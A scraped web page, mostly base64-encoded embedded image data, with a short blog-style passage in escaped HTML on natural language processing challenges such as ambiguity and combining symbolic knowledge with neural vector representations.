X0gbSytbFDHawrEhO\/Ko2A9AB5AeQo1VVUOYkJ4IbqCS2uYklilUo6ON1ZSNiCPMVyDxQ0iui9YXmIg3+Vfa4tSe\/hP1A99juu\/9Wuwa54+JoQf0hw5Xbxvk35\/Xl5zy\/wA+arbJqjLiODkRNy7EYqpSzHuB+1wb+Y1B+nrNCW8hbL38f2oJggi2teUAwfT3389+9MuPajfLwJJJMkKLJJtzuFALbdtz57UNxW3BbzseFplFsepPPmSed\/t0sIu486A48qZcUBx1oqrLOmIs4oLDvTLChMtFUR1BFmHtQmHWmHFCZaOojiLF2FQIo7LQ2G9GAjCrAMKgR7UcjeoMtEAhgIBhUCKOVqBX0qYkwsDymqohX8aqvTNpr8DYVICvAKkBXXbT40kgKkBXgFTHeoETIMkKItQUURRQyJMGEWioKGB0oyDegOJNYVBTCCgoKYRaVcQ6CHjHYUzGKBGOtMxik6gjCCevaJKyyq7RSqNg6d9vQ+o\/Gs54ScK9RcT9THGQ5G1t7G0j8e7uWtyzIm+wUfUAWY9PyJ8qw+MV178J2IgtOH95lhEomyGQcM+3UpGqhR+RL\/rWpdp8YctwD16WjmwHmefteexLmjSLDeZ\/pbhrhtNSW9y8019PZqY7QzcoS1QjqsUaAIm\/mQoZvvE1l1WLXeqJNF6Py2qosTcZNsZbNcC0gOzy7eW+x2HmTsdgCdqtHCHiJPxS0Ra6vuNO3GGe4kkjNvK\/ODynbnRthzKfXYdQR5b1xh1q1UOIfUXtfx3lGQzDiMzSqIBGxrVHH3ibqLQlngcJo5rNM3qO9eCKa6jMiwQxpzSSBPMjdQN+nU1rJeInxBqvKdb6fc\/xNhxv\/I7U5hcoxGLpiqlrHrMimSL3m7M\/wX4e6hufnLjCi1mY7s1m5hDfio+n89t6cx2G4fcKMRNdCWxw1rtvNd3dwFL7ddi7nr+A\/SueL3UPHbMfs8lxfa0gb96PHYqGFtvaT94fjWMZXTmjbK6+3dd6hucxdxrsJ85kDOwHoqt0P4bGrlcpxtVBSxFb4elyf5tGDUqOvAzkjprNoa2+I7KatWXT\/BS1co55J9SXkJSCEdd\/AjYbyP7kbD0PcY3priNxS4WXpu73I5HXWAmAa7trqXmvrd9urwsf3l8+T8h5tS+kcVxC4pumP4TaPl+Q+lDncnG1tj4F9UBHNLsPJR06dNqyLVnAzjlwsg+0F5OImICeJcPj4PAv7Zu7bQbnxU77cpLewAovDlOGP6J2XiPU6+p5Hpt4SNgPh0m4tB8XuH3EiDn0vqGCS5XpJYznwbqI+YaJtm6eo3HvWZVw\/cjhlru5ZL1IbfKxMA6yg2l7E47A77MSPzFZHZjijgAo0nxiz0MSjpFklS\/Tb0HiDoKVr9nSTeg+nj9x9pA0x1t5zr2qrlqLiF8QcK8h13gp9vvyYZQx\/skCn9JcaeKGB1zgsVxByuMy2Gz9w1j4ltZCCS1nK7xkbH6gSNiD\/wD1CpkeKpIXNjbXf+pHuzyM6Wqq8R1kRXQ7qw3B9RXtU8HLDrXUt9pLC\/btrp+4y8FvKpvY7Zx40Nt155kTY+IV6HkGxI327bG16M4lWfEDLXX9FcbJdadtIgPttnKRT3JI\/ZQoV3cKpPM+4Ab6dj12uWuNLXOssKMBHnbnF2lxMvz5thtLcWux54FffePm6AsNztuB33Fu0lw2sdCZy5n0nfNY4C8gHiYMR80EdyCoE0Lb7x7qCGUAhiQ3Qg7sr3Pcni\/fy3\/L9OXWTHDw+MzGuUONuaGa4h5EJJzxWPLZJ7cg+of2y9dX1xrxCsbrHa3zlteRssnz80nXzV3LKfzBB\/OrXIEVq7E7gfWbx2BpI2OqOdwunqRc\/nWY0\/SguKM460NhW3BZ2GmIu4oLimHFBfzogWP0xF2FCYb0dxQmFFCx2mIu60JhTDCgkedEAjiCBYUNh5UZh1qBWiARpRAleneoFelGK1AiiAQoECRUSoopFRI8qzCBYHl9qqp8u9VWbSXDNdr61NRUQKmK69afFk9A2qYFeAb1NaiRMgySiiKKiooqihsIRZNB0oqCoIKMgpdhDKIWMUdB0oSCmIxtSziMKIaMUzGO1AjGxpmMUo4jKCevceBLDF4Mj+M3LzKNwvTua7A+E3M293oS+wvig3GPv2cp5iORVKn9Vf8ASuPJ25Lm1X53weaQ\/Ry7+L07e1bE4U8Rb\/hrqePNW6Ge0mXwb23B28WInfofJgeoP5dia1PtHlz5rgalCn+4EEbbjl66729p7EUTXpFV3nd1V26CrVpnVOC1hiYs3p+\/jurWUd1P1I3mrL3Vh6GrrXDqlN6TFHFiNwZrxBU2M5l42XC5fj7jrJ2548Bp0zIu\/RJp5ipP4lAP5Unwx4Xah45a01XZWuvL7TeK0wlnAptbVJTcTSq7N1YjbYLt5+VI6ima\/wCPvEO7dtxbHHWkf9UC3BI\/Xc1un4JYUl07r3LBQWuNXXEHN6rFDEFH5cx\/Wtox2IqZdk6vRNmstj52J+sOTwr6CTsPgn0uBvneKmu78nusV9HbofyCE\/zrNtIfCxwK0ZILqy0FZ5C83DG7yzNeyFv4v2pKqfdVFbYrh6x1vxrxnxG4zEai1Bqq0y2R1i9o2OuXKYOXC9\/2Ib6Wbk3KkddwPvd9Sw+IzDNQ4auRwi9r2v7cusipd76zte9v8ZhbM3WRvbWxtIQAZJ5FijQeXUkAUjhNY6R1K7x6c1TiMq8fV1sr6Kcr+IRjtWpuN3C7Tt5kLzilrvHal19Z4yKCLEaOs4y9vHOxCFxGm3iFiwJZ9+Uc3cBQMIw\/CnS\/ELNSYV+Bma4Naqxtr9pYnP4iWNol+oLsZIOWNn3I3ib6iu\/UUpRwWHqUe8Zz4mwsPQkMbX1IGnjIhARe83zrbhHwy4jqf6baIxOWlKeGLiaACdV9FlXZ1\/JhWq7v4JuFyhl05qXWeAjPVIbLL80SH2WVGP8AOrD8XeqdZaWvtA4aDVeorHBZE3UWQm0\/IseTu7qONfC2VfqK7kkhRy9ev3a278Plxry74PabuOJS3Y1A9u5uPnF5bgx+I\/gmUdw5i5N9+u\/frvR0bG4DCJiaVYhWNgAT48tuWvS46zPxKoYGc\/8AFL4Vs5oHQOoNZ6f4y6gumwdhNfra3drFJ4gjUswLjbb6QfKtO66yE9xoGw1hj2HzOOlssvAR\/EGU\/wDaNfRHVeGg1HpbMaeulDQ5OwuLOQEb7rJGyH+Rr5v49mvuBUgmH1R4qdNj128MsB\/iitt7M5hWzGlUXEtxEEdNj5eUJTYtYnrO29M3iX+EtbmNt1ZAR+B6j+RFYLmOO+Hw\/GTH8HZdP5GS6vkQ\/PKB4aM6FlAXuy7Dqw7Hfp0NXTgrfHIcOcDdM27TYyzlb8WgXf8AnWaNZWb3aX72kLXMaGNJjGDIqnuobuAfStfXgpOy1FvuN7a9YAWBNxDUtkspjMNZvkMxkbWxtY\/357mZYo1\/FmIApmuLfjszGfOsMDgZJZkwq475qGMEiOS4Mjq7EdiyqEA9Ax\/io2Awn62uKN7SVNO8bhlj41\/FdrrUGp77E6Bz0uGwNlM0MEtmQs13ynbxTIOoUkEqFI6Eb7mrJw64rHV+p7TBcX85I9tdL4EWaflWa2f7njMekkfkS31DcHmAG1LcAeDFrxFy8WT1FeQJioZNkslmAuL5x1KqoPMEH3m8+w8yOguPXw16d1JpdNQYe4x+Ez9jEsUKySJBbXUarskDE7AOAoCtvsNtj02I2Z8RgsFUGEQWNrcQ5Hz5+MssPjGwFUNh2KsOY\/NZZdUcGctisP8A0k03l7PUeJ5S5nsiCQg+9sCQw9SpNa3ete8OOL\/ELhDl1gweUnW0iuibzFSNzwTkEK6leoDEDbmXr0Fb74u6ZtMFqFMji7VrfH5iL5qGI\/8AAv8A8JH7bE77eQYVZYepVp1RQrkG9yp2vbcEdfKdQ7KdpK2PrfosaQXtdWGl7bgja\/PTlea4tL1L6OSSNGURTyQHf1RipP8AKpsKSwjI9vdFIwg+duQQCTufFbc9fWnm9KtAs3\/AOatBHY3JEAwoTDejsKEwG1TCy2piAZaGy0cjyobCphY2gi7DyqBFHYUMipgRpdYFhUCtGIqBFStGFECwobD2o7CoEVkCEAgeU+gqqn+dVWZm01uKmD51EEbURQPQV12fFFp6tEWvFAHlRFA6dKgTJgSS7UQd6iv4UVQPIUJoVVk06CjJUEAoybdKC0YVYRD5UxGPWgoBTEf4Us8YRYZO\/pTEfvQE22o8dKvGkWGEcblWdFJQ7qSOoPtTcZ60uhFMJSbiMosyfRWudSaEyoymnb9oWO3iwt1inUfddfMdT7jyIrsLhfxSw3EzFNcWifK5C2AF3Zs25Qnsyn7yn1\/I1w8hFZrwl1RcaT15iclDM6QyXC210oOweGQhWBHntuG\/FRWn9pMho5nQasotVUXB625Hr4dIDGYFcRTLAfEJlF6CvGriWrDr9oWh\/IwdK3j8DXTh1q2MjZl1pkNx6fsoK01rWxkxHxC6xicbJmLGwyMX\/NWMRMf7Smtr\/BTkYopOJOlidprTUCZLl\/qXMQ2P6xGufZ4O8yRWHIJ9BNdfVT5CdLXt7aY6znyF\/cxW1tbRtNNNK4VI0UbszE9AAASTXIXH74h+G\/FHR82K0VhNZ32Xw95FktP5ywxDfLxX0LbqyuWDcpHMpPL577HYVuj4sZZYfh31u8UjIxsEQkHb6WmjBH5gkfnWntRajsuG\/DVs9b40SwYqygSG1jIQHflRF32+kbsNzt23rjue9p6vZdsGcLhu\/r4ioUReLgFxwb6G\/EXA1sLXvLPKMtp44PUqNwhNZlWE+NbTjYaxbUHDDX8eTNvH84ltheeITco5+Ri4JXm323AO1O\/7NXQv\/q14kf8AyJf\/AMla60RrfVV9qnI6F13hcdZZmys4Mij427FxA8EoBUEgnlccw6b9e\/bYm\/a81ZFobSOT1XNaNdLj4g4hVuUuxYKo32Ow3YbnboN61LM\/8hZjlecDJMRlS\/qGKhVFa4Je3DY8NrG456c5bUuz+Dr0f1CVTw+XSYrafEPhMvx3uuKusuHuuJMbhceMdpa0hwhd4PE63FxLu4CyHqo5d\/pPXt16n4Z8VtFcW8JJndF5J547eXwLqCaIxT2su2\/JIjdQffqD12J2rmLRGuNV3uqbvQ+u8JjbLLRY+HLQyY27W4ge2l22ViCeVxzDz69+2xOU\/DuTa\/EfxFs7cmOC5wuPuZo16K8oIUOR67Mf1NbbgO0uMzLOK2RZngxQq0aQcFanGpW6i23MPe4O4II10r8fldClhBi6D8Qvba06hkIWN2bsFJNfM\/AMo4KXjk\/S1jkCPwLS7V9B+K+om0jwx1XqaNtpcZhry5i67byLExQfm2wr57zx\/YXAwxS\/SzYoAj+tN5fq9dX7GIQlZ+RKj2v95S0tvUTqT4fFZOF2nVfv9kWR\/WIVsmsN4UY44rR+NxxG3ylha2\/9iICsyqpqtxVGYcyYFtSZVYtxC4Z6N4n4gYfWGIju0iJa3l3KywMe5RxsRvsNxvsdhvWU1qnhtxM4jaq4l6q0pqfh9JicNiGcWN+UkXn5ZOVQzN9MhdTzgpsAB57g0SilTWrTNuHXex9JlQdxylu0R8MejuHeprfVml2uI7+0WRYnmuWdQHQo26lduzGs+4h8ONOcUdOJpnViXElok6XP7CUxt4ihgDuB2+o1lNVWGxNZ6gqsxLDY854uxNydZovTvwk8ONNZaDM2uONxcWriSEXV08iI4O4bl2AJHlvvR\/iM0\/DbaNxN+p5pbS+MRbbbdZEJP841rdtan+JWZI9AW0bEbyZKID8o5DVjlmIrVsfSZ2JN7a9Jf9l6rjOcOQdeK3oQQflOStPn+5brr\/x+6\/yrVcWNUkUMIKwxogZi5CjbdidyfxJ614SPSukBbT6FwVM0KK0zyFoNqExorbUNiPKpWlnTMEagaIxA70NtqlaOIYNqG3tRG29KgdvSs2jSGDJqBNEO1QO1ZjCmCaoMd6K23pQ22r0KDB7j1qql09aqvTM1orAURXApcb+VTXr1rq\/EZ8XBYwr0RXpdBvRVFRLGFVIdWFGVhS6CirQi0MqCMq1FRhSyUZaCzGHVI0jUdXFKJRl8tqXYxhUjaOPOmEelI1c+VNRwyHyNKu0aRIyjijxuPWhRWcjGnYce58jSjtGUpmUkgq54EPPmLCGPctJdRKNvUuNqt8ccAyK4v6jO0XjEAdAm+25P41nPDXBLc6809C67r9pW7N+AkBP+Cq7FV1Si79AfkIYiyM3S82j8R2PmwfEzRmskIFtlbebAXRPYMD4sP5li39mocC9RRaH+Iu0iuVKWWusY2NLg7L87CeeMt+KAoPdhWzuPWg5eIPDPJ4uwhDZWy5cji232ZbqH6lCn1ZeZP+vXNE1zda40XYal0\/M1rm8fJHkLJ0bZ7e9hbfl38juCOvqDXKsAq5llr4Rt9R9QfzpNIQhlF\/Kdh\/Ft\/vdNbf8AQov8vHWvPszH5rTqYrK2kV1aXVqkc0Mi7q6lR0IrY2ls7pj4pOBM8F1Ibdc5ZNj8pBEw8SxvF25hsexVwrruOoK+tant+E3xU6agjwdlFofP21miwwX811PBLNGo2UyJtsG277fqe9fP3+Q+yeZ9ocPhqOXsqVsPUckM3AfiCWKna4Kdb6giXuQZhh8B3iYjS9pjfjcHuA21pFajDNld5OZIbi5eUIexfZyAOboN\/PtXqcZOEesHTSr5Jr4ZZltPlpcfPySlzsFO6bAbnue1T0q3xJaxy+osLh9K6L+Z0vfjHX\/i30yr43KG+g9eYbHv0q7Z7TfxS6dweR1BkdK6G+UxlpNeT+HkJmbw40LtsPM7Kelag3+NM3xDd\/mdNquMOpqfrUF2\/wDE2aizaC3\/ALL6aEaWvP8AdYRDwU3AXpwH7j+I3o\/h3ozQSXC6TwUVgbogzOHeR327Dmck7DftvtT3w\/8A++Y19\/7P2H+MtY5o\/GfE7rnS+M1dg9LaHFhl7ZLq2M1\/Mr8jDccy9dj7b1uPgRwbzfDi61DrniDmcffan1H4XzTWSstrZ20S\/TFGX6kdyzEDsPTc33Yrsjn+RZvis07QVg7vTKX7zvHLFkOp1NgFO56AStzrM8HXwn6fD9drWlg+NPVD2fDG04f2F0keQ1tkoccBv9S2yMJJpAPQcqKfZ65p1bjrfN5HSnD9ELR5fKQrNEvnaQ\/VJ+gArKNba3PGbi5kNeQNzadwCPh9P7oQJgD+2uRv\/E24B\/h2HcGocFsXJrPiHltd8vPY4hfsXFHl6SSk7zSA+24Xcdw3tX0hl9E5NlJL6OdfU7D00+c1kfAPL+Z0VBmcNpXT5yubv4rS3ZyeZ+5PYBQOpPTsKSxPFvh\/mbtbG01BGkznZBPG8QY+gLAD+dal4x3c2Q1T9kFv7mxMSQRKO3MVDM34kkD8hWAtj09KNgezVKvhlq1WIZhfS1hfbz+U27Luy1DE4VatdyGYX0tYX25a+4nZAII3B3BrE9MajyeV1rrHB3bxm1ws9lHaBUAZRLbLI258\/qJrAuEHEaa1eLSeoLkvC2yWVxI3VD5Rk+nofLt222yrQ3\/lN4j\/APS8b\/8AZrVFi8vqYB6lKqNhcHr8Q1ms5hl1XLazUavoeRHWZ8rKw3VgR23Br2sJ4OY3I4nQsVllbKe1uBkck5jmQq3K97MynY+RUgj1BBrNqr6ihHKg3sZXkWNpVc0\/F1nYLifEaaBmmjtVa7vIoW6lXICgjueisSB1IPvXQmo9Q43S2Guc3lZeSC3XfYfvO3ki+pJ6Vxfq7KZLVmoL3UOSYma8lL8u\/RF7Kg9goA\/Ktj7NYFq2I\/UkfCv8n+vpN27E5S2LxRxb6IgIB6sRb1sCb+kxO2MQyFy8EM0aFUDk9Ed9umynzC7AkdOw8qZaUCiyWki0u8Mg8q30C07VhrU1sDzJ9zeU0wIobTe9QdHHlQjv51kC0sUeEaYHpQ2lobb7d6GSfWsxtHMKZhUDKKE3SoH2NejK1DCNMNqgZhUGoTdK9DrUMK0wobTChmhsa9DCoYXxlqqWINVXpLvDMCAogG1QWpr3rqxE+OVhEBoq0NfKiLUTDKIVB0oiihr2oqdaEYZYVBR44yahGtOQqOlAcxlFnsVuW23FPw2g6bivIVFPwAdKUdjHKaCewWa9OlXCCzU+QqEO3pT8JFJVCY6iCCvSMdj571bdpjChcIvc0DRdtNc485m8vjcS3pL8oc+HEN\/3QOwPrV5iZSNjVsOAfF4\/JJp55BLeg8kDOBHGzdCy9OnQ+vkKra6v3gfcAHTx6+PSTZSHDjUC+n5vA4XFrqKPMZj5maAXshgtJo2KskUfQMCPItvuPasu4Eakml1Di5skRIcXk4oHu1O8cy84HMD5nbv+R86tkWCg\/o9Hp9bqaGIQrCzxEByPvdSDtv13\/Grrh7K1w1lBYY9PDigACeu\/qfcnrVfUwzVF4G2IIPjeZXDMbA7EG\/iT9p3NXKfFbSbcH+IEuoraPk0hq+455SAAmPyJ77+iSbb7+u\/kBv0Rw81VDq\/SlllRIrXCoIbpR92ZRs369CPYirlqXTmG1dgr3TeoLJLvH5CIxTxN5juCD3BBAII6ggGuP4avVynFFXGxsw\/PlNEZWoVDTcbaGcv6Q1xm+A+tJteYO2mv9NZcqNR4uI7tsO11CN9udd+vqCd++69w6U1Zp3XGAs9UaVysOQxt9GJIZ4j0I8wR3Vh2KnYg9DXB2o8Dn+BuVj09quSW+0rcv4eIzZXcQr5QXG37rAdAexHtuFZ0nltb8IstJqfhFfwPY3jeNf6fuG3sr3oPrj2P7OTYdGHt5dDZZvktLOUGKwhHH8j59D\/8PhJl4p2po3h1idE5zVWdx15dTTasyQyd0kxXlicRqnKmwB26b9dz1q96iwlrqXT+T05fPIltlbOaymaMgOqSoUYqSCN9mO3StX8Lfih4b8SJUwl7cvpjUo+mTD5ZhFIW\/wCSkOyyg+W31bfdFZrr7inw\/wCGGN+1Ncaos8ZG3\/g43bmmmPokS7u\/5A1otbD4xMQEqKe80tprpoLdfSCIa+u8e0LpGw0Bo7D6LxlxPPaYWzjs4pZyDI6oNuZtgBufYVzR8R3HGTX91d8FuGOQ5rAkw6nzcB3jSPs1pC3ZmbsxHQDdev1bY9xH49cQ+NMcmD0pbXui9GzDknuJGC5PIxncFRtuIUI7jqT6kEisGxt1p\/TuRxegNOWDzXl1IqJa2ic7RKe80p36AdySd\/Otwyfs81J\/1uYb728d7n7e8Iq2NzvD32m85NgIdJcP7SOK4l5LRZOfkFpCejzE9zsNz067nfqa6G4W6Hx2j9P2GGxsZFpjYhFGWHWSQ9XkPuSST7msW4QcJBpJb+6vMpLksnlZhNkb515Q3LuEjRevKFB2\/wC7YDbF7eWGBxc17csIbW0jLsfQD\/CT\/M1DNcwOYVRSpftG3ifzaRN3IRdfqZzxxHkD63y5HXafl\/RQP81Yye1MZXJSZTJ3eTmP13UzzMPTmJO386U566RhqRo0UpnkAPYTsOEpGjRSmeQA9hJHY1lHCTinFg9XasTUq3Fx83NYg3S7MyhLcKOZfPpt179POsU5vesfwrf7pdRH\/lbb\/IihYzBUcandVhoff80gsxwNHHqlKuLgn12J09p0Xwv4uYPK6PjvdS6oie+N5fKxkQq3hrdSrGNgoHRAg\/w03qTjrpDDQsuKE2XvCjPHbxfsufl7jmfb1HUA9xXM+jFkhwCJKjI3zFydmGx2M77Vcb60tr+MR3CElG5kZWKsjbbbqw6g7Ejp61Tr2XwhfvGJN9baAfISnw3ZDB1EWqxYkgG1wB8heT1zxOy+t8n8xlM9JbWsbhosaLRgYT03Cjbdt9up2J6nYgbCrXBIl0oLxGB35mWKQjnKA7c2w8u36ivWx2RVORM\/c7DoC0UTMB+PLUrTHW1kzSqzyzSAB5pW5nbbt19Op6dhvV\/QoLQUU6Yso5Tb8DQbCqKdNeFRy\/Cfp6wUtqnpSktovpVzkYGlpCCNqYtL2mxlpmsx5Ck5bUelXiTbrScwHUV7hj9JzLRJbbb7Us8RB6VdZFHWlJVG9YtLCm8t7DbvUGpmRRS7isWjqG8GR51BhUyaga9GVgmFQIqbfhUDWLQokKqqqqxaTmAA0RKAD5UVDXVSbz4+UQ69KIp60FTRFNQMMBDjpRENAB96Kp2oZhVEajemopNtt6QQkUVZNqAwjKGXaGYCnYpwNqscc23TemY7jbuaWdY3TaX+K4HrTkVzt51jsd0R501Hd+9KukbR5kkV0PWnI7vy3rGY7z3pmO9286WdIyrTJ47oetMx3I9axdL0+tNR3\/vSzpGFabY4X8Sp9CZnxJQ0uMuyEu4R3A8nX+sP5jcehHVWMydhmbCHJ4u6jubW4UPHIh3DD\/MfbyrgRL8+tZloLixqPQN1zYycTWcjc09nMSY39x\/C2w7j89603tD2aGZH9Rh9Knyb+\/H3lTmmUDG\/9aWj\/wA\/3OxszhsVqHGXGFzmPgvrG7Tw5redAyOvoQa5v1fwE1pw7kkyfCic5nBbl3wN5L+1gBO5EEp8uvZvfua2ppHj5oDU8aR3eQGHvGOxhvWCqT\/Vk\/dI\/HY+1bEgube6jE1rcRzRt1DRuGB\/MVz0HHZNUs6lfAjQ\/fzE1KpRrYVuGqpHnOJp8zofWb\/YOrsX8hkot1axykRgnjbzCMdv\/pO\/tVNhuHWhJFzGXu0kvBt4VxfzG4nAUbKsYO52AAA2HQV1prPhjofX9sLbVOnrS95d+R3jHOhPcqw6r+IINYbpn4b+HWjb4ZHDYCyE8bc6XNyzzyREdiniE8u3qNquF7RUuC7IeL5e\/wDUiKi25zSmKxvEjiWAum8bJpnCSA82WyEf7eVd+8MPfqOzHp7g1vHhjwawGibR\/su2k8e5+q8yNyee6u233JZj5b+Q2H4nc1kl\/qfh7pEc+Y1HYidevIZBJID7Iu5H6VgepfiVxsQkt9J4l53B2W4u\/pT8QgO5\/MilWTNM7PCiEJ7D1J3\/ADSOYfLsZjdKNM267D3M3Bd3mK07jWur25itLSBd2d22H\/ef5mtBcS+KT6ul+y8WHhxULb\/V0adh2ZvQeg\/M+2vtRa8z+q7oXOdyclwVJKR78sce\/wDCo6CrR9oD+Ktnyjs2mAYVq54n5dB9z4zdMn7OpgWFaseJ+XQfc+Mvfjj1rw3HvVl+fH8VeNfj+Ktk4ZtapLybgVjVpdXMeW1PLZRrJcDwTEjHYM4gGwP57U0b8EfvUnAILa7uryNm8S7ZGk3PT6V5Rt+VQK3tMvQNQpbkfoR9ZLR+V1Ne4+WTVNmltcCUiMBeUsmw7jc+e9Xs3I9as7X3oaE1971lVsLRvDYc0qYQsWtzO8u73XvQXueuwNWpr31bahPe+hqVpYJTlze5HrS8lyOvWrc9570Brvv1r0bp05cHuPelpJ9+9JPdE+dAa43869eO00jck3vS0koJPWl3nPbehNL71Ex2msK8lAZqgz1BmrEdTSesaGTVFqgWrBjCmUx96Ex2NSZqGzViFBlbmqoe4qqxJXmAqdzvvRVNLo1EVq6kTPkMCMK1FU0urUQHyqBMKoh1aiqaXVqIpqBMMojKmphqXVvKiK1BJh1jKtRFallaihutCaHSNI59aKsretKq1EVqA0YWOrOfWjJcH1pFXoivS7CMIZcEumHnR0uz33q2K1ER6XYRhTLql4fWjLeH+KrSr0QSde9LssZUy7ren1p7H6gyWLmFxjMjc2ko+\/BK0bfqpFY6smx70RZD60B0DCxGkYXUWMzxOKvEFU5BrfOcvvfy\/wCmkMhrHUWYHLls9kL0elxdPIB\/aJrFVlO1TEh8jSgwtFDdUAPkISnRpKbqoB8pehfH1qQvtvOrMJTv3r3xT61kiPJLx88d+9e\/OnzarP4p9akJT60MiMJLt86fNq8+dJ+9Vq8U+tV4p9agRGVEuvzp\/iqJvD61bDIfWqEnqaiY0glwN4fWom7PrSHPvXnPUY2gjpuj5Ghtcn1pUyColx616NJaMtOfWhtMaCXqJbrUY1ThTKT51Av70MvUOesRtDCs3nvUC1QL71AvXowphC1QL1Av71EvXiYwpkmaoFqiX6UNnqMOrSZehs1RL0NnqN4UNJc9VQub3qq9eS4pgaNRFbrVVVdQvPksQqtRVYVVVUTCCTVqKrVVVQzCrCK1EDVVVQzDLJq21FVqqqoRjCQqtUw\/pVVVAMOsKrHaiK1VVUFowkmrUVXqqqgNGFhFfrUw9VVUBowkIHqYeqqqC0ZWTV6kJKqqoLRhJMSete89VVUExlJ6JKlz1VVQzGVleJVeJ71VVQzGUnvP6V4JKqqqMapyuf3queqqqhGlkS9eF6qqr0ZSec\/qaiX6VVVUTGkkeeos\/nVVVYjSTwvUGbaqqq9zjCmRL1Bnqqqow6mQL1BmqqqomGUwbNQ2cVVVWIQGR5zVVVVUbyc\/\/9k=\" width=\"304px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>Natural Language Processing is a powerful tool for exploring opinions in Social Media, but the process has its own share of issues. One example would be a \u2018Big Bang Theory-specific \u2018chatbot that understands \u2018Buzzinga\u2019 and even responds to the same. If you think mere words can be confusing, here is an ambiguous sentence with unclear interpretations.<\/p>\n<\/p>\n<p><h2>What are the Natural Language Processing Challenges, and How to fix them?<\/h2>\n<\/p>\n<p><p>Currently, symbol data in language are converted to vector data and then are input into neural networks, and the output from neural networks is further converted to symbol data. In fact, a large amount of knowledge for natural language processing is in the form of symbols, including linguistic knowledge (e.g. grammar), lexical knowledge (e.g. WordNet) and world knowledge (e.g. Wikipedia). Currently, deep learning methods have not yet made effective use of the knowledge. Symbol representations are easy to interpret and manipulate and, on the other hand, vector representations are robust to ambiguity and noise. How to combine symbol data and vector data and how to leverage the strengths of both data types remain an open question for natural language processing. End-to-end training and representation learning are the key features of deep learning that make it a powerful tool for natural language processing.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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ev9NzWyTX+QisZDuGWZvcJHkTHJ+bKv0MpIP+O4HA2XUXrXm9BRajwHTAHLuLoDH5SGTHOzxmMRq0cr8ow282zEsD218gH3WT9EGHD9S7LTk1lZy22pcbdX13GIdkW8t2gUyopJ2Mgn2b1J7aeZO5MSUyTytLyBfLIcsr8fWrWkbBR0sjYmudbzrEgbs88PAX0Om6+eJ8e9G\/abHfr1qHOo2iJ9Z5++zWnvEtf6aivMricitvb3l2VgitEZZbZFjvI4hHPuCw7fqXLiQiIxXMvsVpfG2Vxkb7HY+C2tYmmmlkiVVjRRuzEn0AAJJqIp9cXE0fwobbSWDs54zcQW9\/YmSZYN\/deRu7GASCCVC7KTtu2256SwGmIu\/M\/l\/cuFNWs2i0kQkNG8yWzO7Jl\/ruUEam6crmMfgsbhfE1mcVDhI8pEx+Fb6SS8S5ZjAs0q3iSSdkFVDu7SEDdXiYhhjS9KrW60dd6VyfiSyORmuc3Nk1v7q\/vTNHby20sDWylL1WUASllKsqAovKNjyLTzi9ejN2cOQxOc0Hd21wqNFLFiyyuHOykEXPnufT6awptWNqnGLNiNZaNS2E0JN1j8epEn5kipz9oI4upUe6QSr+RG4Nci97RkTl+UfEpTYoXuGJgz\/wC4f\/zUJ43p7d4rM2N5aeKvJzRWGbschJa3V7dz9+xgSRWspOd4VPMSR\/leO5KBpROxDDG6ZdMLnTOnb2PV3iGuslmsnZX9hcSPmr29gSOZyYGHtE\/vyRAjaQqH29zlxUVanpfb6Xupr3Td\/piwgy9gsc7yLHzS7hbdUmUuWbf3CrBiWBUeZBBMh\/F7A\/U9n+pX91S4aeWaPGJBn+X5qrq9oU1HOYnQOuPzjeL3+yfBUozPTizutNYzTOn\/ABI5fDQ4uye1VosjcFriQXBeGWWRblJmKwyTxPtIpkLRuSphRR6YLRjYgZ\/HT+ITKXdnksVNb2k9znbqaaPIXEjGa5I7oaJUSO2SKOGVQn5dl7Zk3F0\/i9gfqez\/AFK\/up8XsD9T2f6lf3V06lLa3SD9PzUfy1SXv0Dv1\/sVDr7pDkJ8Ocdj\/Fll7Cf4HTHLNDd3aqtx7a9y93st6GaUhhHydmcgHm8ingOq0FpWx0RrODMy9a7vL4v2Im8gvc5cze13\/CNBMY5ZHCgfyltuZB70ScQLaI1cf4vYH6ns\/wBSv7qfF7A\/U9n+pX91DRTHIyD9PzWBtmkabiB36\/2KEPj3o37TY79etY1\/rzEezlNOn4byEp7dva2m7h3PkObgERqN9yx+b0BOwM8fF7A\/U9n+pX91etviMVaSd21x1tE\/9ZIlB\/7VzGzXb3+j5rsf7RQj7MJv2vy8bNB9I71oOl+m73SuisfisnL3LwKZbhuPHeRzyY7fN5k+XzV79RcRf5zR1\/Y4u39ovF7VzBDzCd2SGVJVj5HyBYxhdz5efntXSVx2qupOP09k3wFhirvMZVIVnlt7YoiQI5IQyyOQq8uLbAcm2G\/HbzqdMIoocDzZtrKmpTU1NYJohiffF2Xve50AF+5R7is9i8zCZbO5AkjIWe3k9ya3f50lQ+8jD5wa5brRpnV+t+mma0x091c+nNQX0SJZ5OO6aBrc81LHuIrOvuhvzQCfTcb710+pb\/DaxukvtU9BsVk7mNeCzXN7byOF+jkU32rT\/F3p\/wD\/AG2YH71b\/gqiuGnJwPg73Fe3wOkb58ZF9wdGfTjHqC4i\/wBI+IkzL8F9Y8UkXcmUifGwNtEJFMTECEcnMYdGG6gO6SDcRtFLoPif4psrqk3WS6k4rH4+wzLZSyS1lR4ZbZ7WdFsZEFujSokkqEvITyCKyiN1DVKsOA6aX2ZxunYPD\/gMfeZEScZ79YTbF0KHtxmIMXcx91gGCfzZ9fm6mTw0aDylxHLkdNYK0t0O5trDGRRCT88bOzBn22ZfzWU7oDvsSKkxtmlGKMNPo9YUCeSjpXBtS57b57jcabnHf2hQ3f8ATjrE9jqmDGdU2trnI5yDKYa4e7kcWMC3ssz25RkPuGJoo+BLRkLx4BR72yzemuutzkcDBhOqGNtMZbTzfC87WsDXd1bmdzGEBgMYkEPZXkAqhlk91uSlJts\/Dj0Us04jp3hpPT8+2DfN+msv5AujH92mn\/uKfurqKSotnh+vBRHbV2dc4TJyHf8AfVcNZ6H8QOeymOlw3VKxsMfZY8rPBBKLZ7q+No8JkLC3cqgldpNiWU7JsilAxWGj\/EtFLa2+U6vYi7tVnxxuZY7aCGZ4RbuL0LtalQzTsrJ6bogXdDyZrH\/IF0Y\/u00\/9xT91PkC6Mf3aaf+4p+6s9UqPy\/XgtfKuz73vJyHxKsWkunfiU03jsPj7nrNjshDa3tzc5AXQ9ouLiOe8nk7QuZYWYLFC1uqDgNz3F3RRHx2OV0p4mH1Pk8hier2BXCzZi2ksMe+NiV4MYGLTxtIYmLzHZEU7gBC5J5cWWxnyBdGP7tNP\/cU\/dT5AujH92mn\/uKfurJpKgm\/m\